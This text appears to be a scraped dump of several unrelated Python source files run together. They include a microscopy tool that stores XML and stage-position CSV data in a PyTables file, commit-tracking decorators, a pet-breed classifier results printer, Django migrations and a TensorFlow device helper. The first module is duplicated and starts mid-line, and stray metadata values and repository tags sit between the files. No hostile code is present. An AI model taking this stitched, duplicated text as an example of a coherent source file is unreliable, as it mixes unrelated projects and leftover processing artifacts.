2) / 2); pixelPerMicronScale = normScale * np.array((np.sign(pixelPerMicronX), np.sign(pixelPerMicronY))); assert np.abs(pixelPerMicronScale[0]) == np.abs(pixelPerMicronScale[1]) masks_node.attrs['microns_per_pixel'] = np.abs(pixelPerMicronScale[0]) masks_node.attrs['xy_units'] = 'micrometers' #%% 
Read/Store the CSV file with the stage positions def storeStageData(stage_file, masked_image_file): # read motor data from csv with open(stage_file) as fid: reader = csv.reader(fid) data = [line for line in reader] # if the csv lines must be larger than one (a header), othewise it is an # empty file if len(data) <= 1: with tables.File(masked_image_file, 'r+') as fid: dtype = [('real_time', int), ('stage_time', int), ('stage_x', float), ('stage_y', float)] fid.create_table('/', 'stage_log', obj=np.recarray(0, dtype)) return #import pdb # pdb.set_trace() # filter, check and store the data into a recarray header, data = _getHeader(data) csv_dict = _data2dict(header, data) stage_recarray = _dict2recarray(csv_dict) with tables.File(masked_image_file, 'r+') as mask_fid: if '/stage_log' in mask_fid: mask_fid.remove_node('/', 'stage_log') mask_fid.create_table('/', 'stage_log', obj=stage_recarray) return csv_dict def _timestr2sec(timestr): time_parts = [float(x) for x in timestr.split(':')] return sum((60**ii) * part for ii, part in enumerate(time_parts[::-1])) def _getHeader(data): assert data # find header (it is not always the first line) for ii, line in enumerate(data): if line[0] == 'Real Time': break assert(ii < len(line) - 1) header = data.pop(ii) # check that the expected columns are in header expected_header = [ 'Real Time', 'Media Time', 'Location Type', 'Centroid/Stage/Speed X (microns[/second])', 'Centroid/Stage/Speed Y (microns[/second])', 'MER Min X (microns)', 'MER Min Y (microns)', 'MER Width (microns)', 'MER Height (microns)'] assert all(col in expected_header for col in header) return header, data def _data2dict(header, data): # read the csv data into a dictionary where each field is the data from a # column assert data # filter any possible croped data data = [x for x in data if len(x) == len(header)] # save data into a dictionary csv_dict = {} for ii, col_data in enumerate(zip(*data)): csv_dict[header[ii]] = col_data # Check the data is correct # This 
is not really a necessary assertion this STAGE flag does not seem useuful. #assert all(x == 'STAGE' for x in csv_dict['Location Type']) del csv_dict['Location Type'] # delete this columns # for col_name in ['MER Min X (microns)', 'MER Min Y (microns)', \ #'MER Width (microns)', 'MER Height (microns)']: # if col_name in csv_dict #assert all(not x for x in csv_dict[col_name]) #del csv_dict[col_name] return csv_dict def _dict2recarray(csv_dict): # convert the csv data into a recarray compatible with pytables dat = OrderedDict() dat['real_time'] = np.array([bytes(x, 'utf-8') for x in csv_dict['Real Time']]) dat['stage_time'] = np.array([_timestr2sec(x) for x in csv_dict['Media Time']]) dat['stage_x'] = np.array( [float(d) for d in csv_dict['Centroid/Stage/Speed X (microns[/second])']]) dat['stage_y'] = np.array( [float(d) for d in csv_dict['Centroid/Stage/Speed Y (microns[/second])']]) # convert into recarray (pytables friendly) dtype = [(kk, dat[kk].dtype) for kk in dat] N = len(dat['stage_x']) stage_recarray = np.recarray(N, dtype) for kk in dat: stage_recarray[kk] = dat[kk] return stage_recarray def getAdditionalFiles(video_file): if not (os.path.exists(video_file)): raise FileNotFoundError(video_file) base_name = os.path.splitext(video_file)[0] info_file = base_name + '.info.xml' stage_file = base_name + '.log.csv' info_file = _getValidFile(info_file) stage_file = _getValidFile(stage_file) return info_file, stage_file def hasAdditionalFiles(video_file): try: getAdditionalFiles(video_file) return True except FileNotFoundError: return False def _insertDirectory(original_file, dir2add): dd = os.path.split(original_file) return os.path.join(dd[0], dir2add, dd[1]) def _getValidFile(file_name): if not os.path.exists(file_name): file_name = _insertDirectory(file_name, '.data') if not os.path.exists(file_name): raise FileNotFoundError( 'Additional %s file do not exists.' 
% file_name) # if (os.stat(file_name).st_size == 0): # raise IOError('%s is empty' % file_name) return file_name #%% main function to store the additional data def storeAdditionalDataSW(video_file, masked_image_file): assert(os.path.exists(video_file)) assert(os.path.exists(masked_image_file)) info_file, stage_file = getAdditionalFiles(video_file) assert(os.path.exists(video_file)) assert(os.path.exists(stage_file)) # store data storeXMLInfo(info_file, masked_image_file) storeStageData(stage_file, masked_image_file) with tables.File(masked_image_file, 'r+') as mask_fid: mask_fid.get_node('/mask').attrs['has_finished'] = 2 # DEPRECATED def walkXML(curr_node, params=[], curr_path=''): ''' Return the structure of a ElementTree into a directory list. I am not really using this function but it is cool. ''' curr_path += '/' + curr_node.tag if len(curr_node) == 0: param.append((curr_path, curr_node.text)) return params for node in curr_node: walkXML(node, params, curr_path)
""" # -*- coding: utf-8 -*- Created on Thu Dec 17 10:10:35 2015 @author: ajaver """ import os import stat import xml.etree.ElementTree as ET import tables import numpy as np import csv from collections import OrderedDict #%% Read/Store the XML file with the pixel size and fps info def storeXMLInfo(info_file, masked_image_file): with open(info_file, 'r') as fid: xml_info = fid.read() # if it is empty the xml create a node and exit if not xml_info: with tables.File(masked_image_file, 'r+') as fid: fid.create_array('/', 'xml_info', obj=bytes('', 'utf-8')) return # read the xml and exit root = ET.fromstring(xml_info) x_microns = float(root.findall( './info/stage/steps/equivalent/microns/x')[0].text) y_microns = float(root.findall( './info/stage/steps/equivalent/microns/y')[0].text) x_pixels = float(root.findall( './info/stage/steps/equivalent/pixels/x')[0].text) y_pixels = float(root.findall( './info/stage/steps/equivalent/pixels/y')[0].text) fps = float(root.findall('./info/camera/display/frame/rate')[0].text) pixels2microns_x = x_microns / x_pixels pixels2microns_y = y_microns / y_pixels with tables.File(masked_image_file, 'r+') as fid: if '/xml_info' in fid: fid.remove_node('/', 'xml_info') xml_node = fid.create_array( '/', 'xml_info', obj=bytes( xml_info, 'utf-8')) masks_node = fid.get_node('/', 'mask') masks_node.attrs['fps'] = fps masks_node.attrs['pixels2microns_x'] = pixels2microns_x masks_node.attrs['pixels2microns_y'] = pixels2microns_y # Read the scale conversions, we would need this when we want to convert the pixels into microns pixelPerMicronX = 1/pixels2microns_x pixelPerMicronY = 1/pixels2microns_y normScale = np.sqrt((pixelPerMicronX ** 2 + pixelPerMicronX ** 2) / 2); pixelPerMicronScale = normScale * np.array((np.sign(pixelPerMicronX), np.sign(pixelPerMicronY))); assert np.abs(pixelPerMicronScale[0]) == np.abs(pixelPerMicronScale[1]) masks_node.attrs['microns_per_pixel'] = np.abs(pixelPerMicronScale[0]) masks_node.attrs['xy_units'] = 'micrometers' #%% 
Read/Store the CSV file with the stage positions def storeStageData(stage_file, masked_image_file): # read motor data from csv with open(stage_file) as fid: reader = csv.reader(fid) data = [line for line in reader] # if the csv lines must be larger than one (a header), othewise it is an # empty file if len(data) <= 1: with tables.File(masked_image_file, 'r+') as fid: dtype = [('real_time', int), ('stage_time', int), ('stage_x', float), ('stage_y', float)] fid.create_table('/', 'stage_log', obj=np.recarray(0, dtype)) return #import pdb # pdb.set_trace() # filter, check and store the data into a recarray header, data = _getHeader(data) csv_dict = _data2dict(header, data) stage_recarray = _dict2recarray(csv_dict) with tables.File(masked_image_file, 'r+') as mask_fid: if '/stage_log' in mask_fid: mask_fid.remove_node('/', 'stage_log') mask_fid.create_table('/', 'stage_log', obj=stage_recarray) return csv_dict def _timestr2sec(timestr): time_parts = [float(x) for x in timestr.split(':')] return sum((60**ii) * part for ii, part in enumerate(time_parts[::-1])) def _getHeader(data): assert data # find header (it is not always the first line) for ii, line in enumerate(data): if line[0] == 'Real Time': break assert(ii < len(line) - 1) header = data.pop(ii) # check that the expected columns are in header expected_header = [ 'Real Time', 'Media Time', 'Location Type', 'Centroid/Stage/Speed X (microns[/second])', 'Centroid/Stage/Speed Y (microns[/second])', 'MER Min X (microns)', 'MER Min Y (microns)', 'MER Width (microns)', 'MER Height (microns)'] assert all(col in expected_header for col in header) return header, data def _data2dict(header, data): # read the csv data into a dictionary where each field is the data from a # column assert data # filter any possible croped data data = [x for x in data if len(x) == len(header)] # save data into a dictionary csv_dict = {} for ii, col_data in enumerate(zip(*data)): csv_dict[header[ii]] = col_data # Check the data is correct # This 
is not really a necessary assertion this STAGE flag does not seem useuful. #assert all(x == 'STAGE' for x in csv_dict['Location Type']) del csv_dict['Location Type'] # delete this columns # for col_name in ['MER Min X (microns)', 'MER Min Y (microns)', \ #'MER Width (microns)', 'MER Height (microns)']: # if col_name in csv_dict #assert all(not x for x in csv_dict[col_name]) #del csv_dict[col_name] return csv_dict def _dict2recarray(csv_dict): # convert the csv data into a recarray compatible with pytables dat = OrderedDict() dat['real_time'] = np.array([bytes(x, 'utf-8') for x in csv_dict['Real Time']]) dat['stage_time'] = np.array([_timestr2sec(x) for x in csv_dict['Media Time']]) dat['stage_x'] = np.array( [float(d) for d in csv_dict['Centroid/Stage/Speed X (microns[/second])']]) dat['stage_y'] = np.array( [float(d) for d in csv_dict['Centroid/Stage/Speed Y (microns[/second])']]) # convert into recarray (pytables friendly) dtype = [(kk, dat[kk].dtype) for kk in dat] N = len(dat['stage_x']) stage_recarray = np.recarray(N, dtype) for kk in dat: stage_recarray[kk] = dat[kk] return stage_recarray def getAdditionalFiles(video_file): if not (os.path.exists(video_file)): raise FileNotFoundError(video_file) base_name = os.path.splitext(video_file)[0] info_file = base_name + '.info.xml' stage_file = base_name + '.log.csv' info_file = _getValidFile(info_file) stage_file = _getValidFile(stage_file) return info_file, stage_file def hasAdditionalFiles(video_file): try: getAdditionalFiles(video_file) return True except FileNotFoundError: return False def _insertDirectory(original_file, dir2add): dd = os.path.split(original_file) return os.path.join(dd[0], dir2add, dd[1]) def _getValidFile(file_name): if not os.path.exists(file_name): file_name = _insertDirectory(file_name, '.data') if not os.path.exists(file_name): raise FileNotFoundError( 'Additional %s file do not exists.' 
% file_name) # if (os.stat(file_name).st_size == 0): # raise IOError('%s is empty' % file_name) return file_name #%% main function to store the additional data def storeAdditionalDataSW(video_file, masked_image_file): assert(os.path.exists(video_file)) assert(os.path.exists(masked_image_file)) info_file, stage_file = getAdditionalFiles(video_file) assert(os.path.exists(video_file)) assert(os.path.exists(stage_file)) # store data storeXMLInfo(info_file, masked_image_file) storeStageData(stage_file, masked_image_file) with tables.File(masked_image_file, 'r+') as mask_fid: mask_fid.get_node('/mask').attrs['has_finished'] = 2 # DEPRECATED def walkXML(curr_node, params=[], curr_path=''): ''' Return the structure of a ElementTree into a directory list. I am not really using this function but it is cool. ''' curr_path += '/' + curr_node.tag if len(curr_node) == 0: param.append((curr_path, curr_node.text)) return params for node in curr_node: walkXML(node, params, curr_path)
en
0.792479
# -*- coding: utf-8 -*- Created on Thu Dec 17 10:10:35 2015 @author: ajaver #%% Read/Store the XML file with the pixel size and fps info # if it is empty the xml create a node and exit # read the xml and exit # Read the scale conversions, we would need this when we want to convert the pixels into microns #%% Read/Store the CSV file with the stage positions # read motor data from csv # if the csv lines must be larger than one (a header), othewise it is an # empty file #import pdb # pdb.set_trace() # filter, check and store the data into a recarray # find header (it is not always the first line) # check that the expected columns are in header # read the csv data into a dictionary where each field is the data from a # column # filter any possible croped data # save data into a dictionary # Check the data is correct # This is not really a necessary assertion this STAGE flag does not seem useuful. #assert all(x == 'STAGE' for x in csv_dict['Location Type']) # delete this columns # for col_name in ['MER Min X (microns)', 'MER Min Y (microns)', \ #'MER Width (microns)', 'MER Height (microns)']: # if col_name in csv_dict #assert all(not x for x in csv_dict[col_name]) #del csv_dict[col_name] # convert the csv data into a recarray compatible with pytables # convert into recarray (pytables friendly) # if (os.stat(file_name).st_size == 0): # raise IOError('%s is empty' % file_name) #%% main function to store the additional data # store data # DEPRECATED Return the structure of a ElementTree into a directory list. I am not really using this function but it is cool.
2.262056
2
commitroll/commitable.py
claybrooks/commitroll
0
6623578
<reponame>claybrooks/commitroll<gh_stars>0 from functools import wraps COMMIT="1__commit" NO_COMMIT="2__no_commit" COMMIT_ALL="3__commit_all" SAVE_STATE="4__save_state" def Commit(func): setattr(func, COMMIT, True) return func def NoCommit(obj): setattr(obj, NO_COMMIT, True) return obj def CommitAll(obj): setattr(obj, COMMIT_ALL, True) return obj def SaveState(_lambda): def wrapper(f): @wraps(f) def wrapped(inst, *args, **kwargs): f(inst, *args, **kwargs) setattr(inst, SAVE_STATE, list(_lambda(inst))) return wrapped return wrapper
from functools import wraps COMMIT="1__commit" NO_COMMIT="2__no_commit" COMMIT_ALL="3__commit_all" SAVE_STATE="4__save_state" def Commit(func): setattr(func, COMMIT, True) return func def NoCommit(obj): setattr(obj, NO_COMMIT, True) return obj def CommitAll(obj): setattr(obj, COMMIT_ALL, True) return obj def SaveState(_lambda): def wrapper(f): @wraps(f) def wrapped(inst, *args, **kwargs): f(inst, *args, **kwargs) setattr(inst, SAVE_STATE, list(_lambda(inst))) return wrapped return wrapper
none
1
2.574703
3
intropyproject-classify-pet-images/print_results.py
petercm/AIPND-revision
0
6623579
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # */AIPND-revision/intropyproject-classify-pet-images/print_results.py # # PROGRAMMER: petercm # DATE CREATED: 01/03/2019 # REVISED DATE: # PURPOSE: Create a function print_results that prints the results statistics # from the results statistics dictionary (results_stats_dic). It # should also allow the user to be able to print out cases of misclassified # dogs and cases of misclassified breeds of dog using the Results # dictionary (results_dic). # This function inputs: # -The results dictionary as results_dic within print_results # function and results for the function call within main. # -The results statistics dictionary as results_stats_dic within # print_results function and results_stats for the function call within main. # -The CNN model architecture as model wihtin print_results function # and in_arg.arch for the function call within main. # -Prints Incorrectly Classified Dogs as print_incorrect_dogs within # print_results function and set as either boolean value True or # False in the function call within main (defaults to False) # -Prints Incorrectly Classified Breeds as print_incorrect_breed within # print_results function and set as either boolean value True or # False in the function call within main (defaults to False) # This function does not output anything other than printing a summary # of the final results. ## # TODO 6: Define print_results function below, specifically replace the None # below by the function definition of the print_results function. 
# Notice that this function doesn't to return anything because it # prints a summary of the results using results_dic and results_stats_dic # stat_labels = { 'n_images': 'Number of Images', 'n_dogs_img': 'Number of Dog Images', 'n_notdogs_img': 'Number of "Not-a" Dog Images', 'n_match': 'Number of Correct Matches', 'n_correct_dogs': 'Number of Correct Dog Matches', 'n_correct_notdogs': 'Number of Correct "Not-a" Dog Matches', 'n_correct_breed': 'Number of Correct Breed Matches', 'pct_match': '% Match', 'pct_correct_dogs': '% Correct Dogs', 'pct_correct_breed': '% Correct Breed', 'pct_correct_notdogs': '% Correct "Not-a" Dog' } def print_stat(label, stat=''): print("| {:43} {:>17} |".format(label, stat)) def print_misclassified(results_dic, filter): for key in results_dic: result = results_dic[key] if filter(result): print("|") print("| {:30} {}".format(key, result[0])) print("| {:30} {}".format('', result[1])) def print_results(results_dic, results_stats_dic, model, print_incorrect_dogs = False, print_incorrect_breed = False): """ Prints summary results on the classification and then prints incorrectly classified dogs and incorrectly classified dog breeds if user indicates they want those printouts (use non-default values) Parameters: results_dic - Dictionary with key as image filename and value as a List (index)idx 0 = pet image label (string) idx 1 = classifier label (string) idx 2 = 1/0 (int) where 1 = match between pet image and classifer labels and 0 = no match between labels idx 3 = 1/0 (int) where 1 = pet image 'is-a' dog and 0 = pet Image 'is-NOT-a' dog. idx 4 = 1/0 (int) where 1 = Classifier classifies image 'as-a' dog and 0 = Classifier classifies image 'as-NOT-a' dog. 
results_stats_dic - Dictionary that contains the results statistics (either a percentage or a count) where the key is the statistic's name (starting with 'pct' for percentage or 'n' for count) and the value is the statistic's value model - Indicates which CNN model architecture will be used by the classifier function to classify the pet images, values must be either: resnet alexnet vgg (string) print_incorrect_dogs - True prints incorrectly classified dog images and False doesn't print anything(default) (bool) print_incorrect_breed - True prints incorrectly classified dog breeds and False doesn't print anything(default) (bool) Returns: None - simply printing results. """ print("\n") print("-----------------------------------------------------------------") print_stat('Dog breed classification results for model:', model) print("|---------------------------------------------------------------|") for stat_key in ['n_images', 'n_dogs_img', 'n_notdogs_img']: print_stat(stat_labels[stat_key], results_stats_dic[stat_key]) print("|---------------------------------------------------------------|") for stat_key in stat_labels: if stat_key.startswith('pct_'): print_stat(stat_labels[stat_key], results_stats_dic[stat_key]) print("|---------------------------------------------------------------|") n_correct_dogs = results_stats_dic['n_correct_dogs'] n_correct_notdogs = results_stats_dic['n_correct_notdogs'] n_correct_breed = results_stats_dic['n_correct_breed'] if print_incorrect_dogs: n_dog_misses = results_stats_dic['n_images'] - n_correct_dogs - n_correct_notdogs if n_dog_misses > 0: print_stat('Some dogs were misclassified:', n_dog_misses) print_misclassified(results_dic, lambda result: sum(result[3:]) == 1) else: print_stat('No dogs were misclassified') print("|---------------------------------------------------------------|") if print_incorrect_breed: n_breed_misses = n_correct_dogs - n_correct_breed if n_breed_misses > 0: print_stat('Some breeds were misclassified:', 
n_breed_misses) print_misclassified(results_dic, lambda result: sum(result[3:]) == 2 and result[2] == 0) else: print_stat('No breeds were misclassified') print("|---------------------------------------------------------------|")
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # */AIPND-revision/intropyproject-classify-pet-images/print_results.py # # PROGRAMMER: petercm # DATE CREATED: 01/03/2019 # REVISED DATE: # PURPOSE: Create a function print_results that prints the results statistics # from the results statistics dictionary (results_stats_dic). It # should also allow the user to be able to print out cases of misclassified # dogs and cases of misclassified breeds of dog using the Results # dictionary (results_dic). # This function inputs: # -The results dictionary as results_dic within print_results # function and results for the function call within main. # -The results statistics dictionary as results_stats_dic within # print_results function and results_stats for the function call within main. # -The CNN model architecture as model wihtin print_results function # and in_arg.arch for the function call within main. # -Prints Incorrectly Classified Dogs as print_incorrect_dogs within # print_results function and set as either boolean value True or # False in the function call within main (defaults to False) # -Prints Incorrectly Classified Breeds as print_incorrect_breed within # print_results function and set as either boolean value True or # False in the function call within main (defaults to False) # This function does not output anything other than printing a summary # of the final results. ## # TODO 6: Define print_results function below, specifically replace the None # below by the function definition of the print_results function. 
# Notice that this function doesn't to return anything because it # prints a summary of the results using results_dic and results_stats_dic # stat_labels = { 'n_images': 'Number of Images', 'n_dogs_img': 'Number of Dog Images', 'n_notdogs_img': 'Number of "Not-a" Dog Images', 'n_match': 'Number of Correct Matches', 'n_correct_dogs': 'Number of Correct Dog Matches', 'n_correct_notdogs': 'Number of Correct "Not-a" Dog Matches', 'n_correct_breed': 'Number of Correct Breed Matches', 'pct_match': '% Match', 'pct_correct_dogs': '% Correct Dogs', 'pct_correct_breed': '% Correct Breed', 'pct_correct_notdogs': '% Correct "Not-a" Dog' } def print_stat(label, stat=''): print("| {:43} {:>17} |".format(label, stat)) def print_misclassified(results_dic, filter): for key in results_dic: result = results_dic[key] if filter(result): print("|") print("| {:30} {}".format(key, result[0])) print("| {:30} {}".format('', result[1])) def print_results(results_dic, results_stats_dic, model, print_incorrect_dogs = False, print_incorrect_breed = False): """ Prints summary results on the classification and then prints incorrectly classified dogs and incorrectly classified dog breeds if user indicates they want those printouts (use non-default values) Parameters: results_dic - Dictionary with key as image filename and value as a List (index)idx 0 = pet image label (string) idx 1 = classifier label (string) idx 2 = 1/0 (int) where 1 = match between pet image and classifer labels and 0 = no match between labels idx 3 = 1/0 (int) where 1 = pet image 'is-a' dog and 0 = pet Image 'is-NOT-a' dog. idx 4 = 1/0 (int) where 1 = Classifier classifies image 'as-a' dog and 0 = Classifier classifies image 'as-NOT-a' dog. 
results_stats_dic - Dictionary that contains the results statistics (either a percentage or a count) where the key is the statistic's name (starting with 'pct' for percentage or 'n' for count) and the value is the statistic's value model - Indicates which CNN model architecture will be used by the classifier function to classify the pet images, values must be either: resnet alexnet vgg (string) print_incorrect_dogs - True prints incorrectly classified dog images and False doesn't print anything(default) (bool) print_incorrect_breed - True prints incorrectly classified dog breeds and False doesn't print anything(default) (bool) Returns: None - simply printing results. """ print("\n") print("-----------------------------------------------------------------") print_stat('Dog breed classification results for model:', model) print("|---------------------------------------------------------------|") for stat_key in ['n_images', 'n_dogs_img', 'n_notdogs_img']: print_stat(stat_labels[stat_key], results_stats_dic[stat_key]) print("|---------------------------------------------------------------|") for stat_key in stat_labels: if stat_key.startswith('pct_'): print_stat(stat_labels[stat_key], results_stats_dic[stat_key]) print("|---------------------------------------------------------------|") n_correct_dogs = results_stats_dic['n_correct_dogs'] n_correct_notdogs = results_stats_dic['n_correct_notdogs'] n_correct_breed = results_stats_dic['n_correct_breed'] if print_incorrect_dogs: n_dog_misses = results_stats_dic['n_images'] - n_correct_dogs - n_correct_notdogs if n_dog_misses > 0: print_stat('Some dogs were misclassified:', n_dog_misses) print_misclassified(results_dic, lambda result: sum(result[3:]) == 1) else: print_stat('No dogs were misclassified') print("|---------------------------------------------------------------|") if print_incorrect_breed: n_breed_misses = n_correct_dogs - n_correct_breed if n_breed_misses > 0: print_stat('Some breeds were misclassified:', 
n_breed_misses) print_misclassified(results_dic, lambda result: sum(result[3:]) == 2 and result[2] == 0) else: print_stat('No breeds were misclassified') print("|---------------------------------------------------------------|")
en
0.7831
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # */AIPND-revision/intropyproject-classify-pet-images/print_results.py # # PROGRAMMER: petercm # DATE CREATED: 01/03/2019 # REVISED DATE: # PURPOSE: Create a function print_results that prints the results statistics # from the results statistics dictionary (results_stats_dic). It # should also allow the user to be able to print out cases of misclassified # dogs and cases of misclassified breeds of dog using the Results # dictionary (results_dic). # This function inputs: # -The results dictionary as results_dic within print_results # function and results for the function call within main. # -The results statistics dictionary as results_stats_dic within # print_results function and results_stats for the function call within main. # -The CNN model architecture as model wihtin print_results function # and in_arg.arch for the function call within main. # -Prints Incorrectly Classified Dogs as print_incorrect_dogs within # print_results function and set as either boolean value True or # False in the function call within main (defaults to False) # -Prints Incorrectly Classified Breeds as print_incorrect_breed within # print_results function and set as either boolean value True or # False in the function call within main (defaults to False) # This function does not output anything other than printing a summary # of the final results. ## # TODO 6: Define print_results function below, specifically replace the None # below by the function definition of the print_results function. 
# Notice that this function doesn't to return anything because it # prints a summary of the results using results_dic and results_stats_dic # Prints summary results on the classification and then prints incorrectly classified dogs and incorrectly classified dog breeds if user indicates they want those printouts (use non-default values) Parameters: results_dic - Dictionary with key as image filename and value as a List (index)idx 0 = pet image label (string) idx 1 = classifier label (string) idx 2 = 1/0 (int) where 1 = match between pet image and classifer labels and 0 = no match between labels idx 3 = 1/0 (int) where 1 = pet image 'is-a' dog and 0 = pet Image 'is-NOT-a' dog. idx 4 = 1/0 (int) where 1 = Classifier classifies image 'as-a' dog and 0 = Classifier classifies image 'as-NOT-a' dog. results_stats_dic - Dictionary that contains the results statistics (either a percentage or a count) where the key is the statistic's name (starting with 'pct' for percentage or 'n' for count) and the value is the statistic's value model - Indicates which CNN model architecture will be used by the classifier function to classify the pet images, values must be either: resnet alexnet vgg (string) print_incorrect_dogs - True prints incorrectly classified dog images and False doesn't print anything(default) (bool) print_incorrect_breed - True prints incorrectly classified dog breeds and False doesn't print anything(default) (bool) Returns: None - simply printing results.
3.124228
3
kitsune/karma/migrations/0001_initial.py
navgurukul-shivani18/kitsune
929
6623580
<filename>kitsune/karma/migrations/0001_initial.py # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations from django.conf import settings class Migration(migrations.Migration): dependencies = [ ('auth', '0001_initial'), migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Title', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(unique=True, max_length=100)), ('is_auto', models.BooleanField(default=False)), ('groups', models.ManyToManyField(help_text=b'Assign this title to these groups.', to='auth.Group', blank=True)), ('users', models.ManyToManyField(help_text=b'Assign this title to these users.', to=settings.AUTH_USER_MODEL, blank=True)), ], options={ 'abstract': False, }, bases=(models.Model,), ), ]
<filename>kitsune/karma/migrations/0001_initial.py # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations from django.conf import settings class Migration(migrations.Migration): dependencies = [ ('auth', '0001_initial'), migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Title', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(unique=True, max_length=100)), ('is_auto', models.BooleanField(default=False)), ('groups', models.ManyToManyField(help_text=b'Assign this title to these groups.', to='auth.Group', blank=True)), ('users', models.ManyToManyField(help_text=b'Assign this title to these users.', to=settings.AUTH_USER_MODEL, blank=True)), ], options={ 'abstract': False, }, bases=(models.Model,), ), ]
en
0.769321
# -*- coding: utf-8 -*-
1.747541
2
contacts/migrations/0012_auto_20190418_0543.py
martbln/django-service-boilerplate
18
6623581
<filename>contacts/migrations/0012_auto_20190418_0543.py # Generated by Django 2.1.7 on 2019-04-18 05:43 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import pik.core.models.uided import simple_history.models import core.fields class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('contacts', '0011_auto_20190403_0607'), ] operations = [ migrations.CreateModel( name='Category', fields=[ ('created', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='created')), ('updated', models.DateTimeField(auto_now=True, db_index=True, verbose_name='updated')), ('uid', models.UUIDField(default=pik.core.models.uided._new_uid, editable=False, primary_key=True, serialize=False)), ('version', models.IntegerField(editable=False)), ('name', core.fields.NormalizedCharField(max_length=255, verbose_name='Название')), ('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contacts.Category')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='HistoricalCategory', fields=[ ('created', models.DateTimeField(blank=True, db_index=True, editable=False, verbose_name='created')), ('updated', models.DateTimeField(blank=True, db_index=True, editable=False, verbose_name='updated')), ('uid', models.UUIDField(db_index=True, default=pik.core.models.uided._new_uid, editable=False)), ('version', models.IntegerField(editable=False)), ('name', core.fields.NormalizedCharField(max_length=255, verbose_name='Название')), ('history_id', models.AutoField(primary_key=True, serialize=False)), ('history_date', models.DateTimeField()), ('history_change_reason', models.CharField(max_length=100, null=True)), ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)), ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', 
to=settings.AUTH_USER_MODEL)), ('parent', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='contacts.Category')), ], options={ 'verbose_name': 'historical category', 'ordering': ('-history_date', '-history_id'), 'get_latest_by': 'history_date', }, bases=(simple_history.models.HistoricalChanges, models.Model), ), migrations.AddField( model_name='contact', name='category', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contacts.Category'), ), migrations.AddField( model_name='historicalcontact', name='category', field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='contacts.Category'), ), ]
<filename>contacts/migrations/0012_auto_20190418_0543.py # Generated by Django 2.1.7 on 2019-04-18 05:43 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import pik.core.models.uided import simple_history.models import core.fields class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('contacts', '0011_auto_20190403_0607'), ] operations = [ migrations.CreateModel( name='Category', fields=[ ('created', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='created')), ('updated', models.DateTimeField(auto_now=True, db_index=True, verbose_name='updated')), ('uid', models.UUIDField(default=pik.core.models.uided._new_uid, editable=False, primary_key=True, serialize=False)), ('version', models.IntegerField(editable=False)), ('name', core.fields.NormalizedCharField(max_length=255, verbose_name='Название')), ('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contacts.Category')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='HistoricalCategory', fields=[ ('created', models.DateTimeField(blank=True, db_index=True, editable=False, verbose_name='created')), ('updated', models.DateTimeField(blank=True, db_index=True, editable=False, verbose_name='updated')), ('uid', models.UUIDField(db_index=True, default=pik.core.models.uided._new_uid, editable=False)), ('version', models.IntegerField(editable=False)), ('name', core.fields.NormalizedCharField(max_length=255, verbose_name='Название')), ('history_id', models.AutoField(primary_key=True, serialize=False)), ('history_date', models.DateTimeField()), ('history_change_reason', models.CharField(max_length=100, null=True)), ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)), ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', 
to=settings.AUTH_USER_MODEL)), ('parent', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='contacts.Category')), ], options={ 'verbose_name': 'historical category', 'ordering': ('-history_date', '-history_id'), 'get_latest_by': 'history_date', }, bases=(simple_history.models.HistoricalChanges, models.Model), ), migrations.AddField( model_name='contact', name='category', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contacts.Category'), ), migrations.AddField( model_name='historicalcontact', name='category', field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='contacts.Category'), ), ]
en
0.620975
# Generated by Django 2.1.7 on 2019-04-18 05:43
1.593965
2
castanea/utils/with_none.py
YusukeSuzuki/castanea
0
6623582
<gh_stars>0 import tensorflow as tf class WithNone: def __enter__(self): pass def __exit__(self,t,v,tb): pass def device_or_none(x): return WithNone() if x is None else tf.device(x)
import tensorflow as tf class WithNone: def __enter__(self): pass def __exit__(self,t,v,tb): pass def device_or_none(x): return WithNone() if x is None else tf.device(x)
none
1
2.574156
3
sample-viewer-api/src/static/data/compile_cvisb_data/config.py
cvisb/cvisb_data
2
6623583
